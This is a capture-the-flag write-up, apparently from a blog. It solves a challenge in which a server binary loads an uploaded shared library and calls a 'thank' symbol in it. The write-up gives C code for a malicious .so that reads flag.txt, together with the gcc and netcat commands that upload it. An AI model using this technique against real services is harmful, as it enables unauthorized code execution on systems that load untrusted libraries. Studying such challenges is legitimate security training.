First look Link to heading

Connecting to netcat we get :

What is the size of your file (in bytes)?
1234
Send your file!
azerty
Thanks for your file!

Ok so we have to send a file.

Decompiling Link to heading

Lets open binary ninja and take a look.

We find the function asking for the file size : file size function
Space for the file is malloc’ed
The file is then asked for and read

ask for file

After some checks and I believe a write to the disk we get to the interesting part

Exec function Link to heading

We find an interesting function, after a bit of reading the manual we understand that dlopen opens a shared library object, dlsym finds a symbol in it and returns its address which is then executed by rax3(). So we need to send a shared library object which contains a symbol thank (a function for example), and that function will get executed. Let’s do it !!

exec function

Getting the flag Link to heading

We write a small c program with a thank function.

#include <stdio.h>

void thank(void){
    FILE* file = fopen("flag.txt", "r");
    char buff[101];
    fgets(buff, 100, file);
    printf("%s", buff);
}

We then compile it and send it to the server.

gcc -shared -fPIC -o exploit.so exploit.c
(echo `du -b exploit.so`; cat exploit.so) | nc challs.pwnoh.io 13373

And boom we get the flag (I didn’t save it so can’t put it here).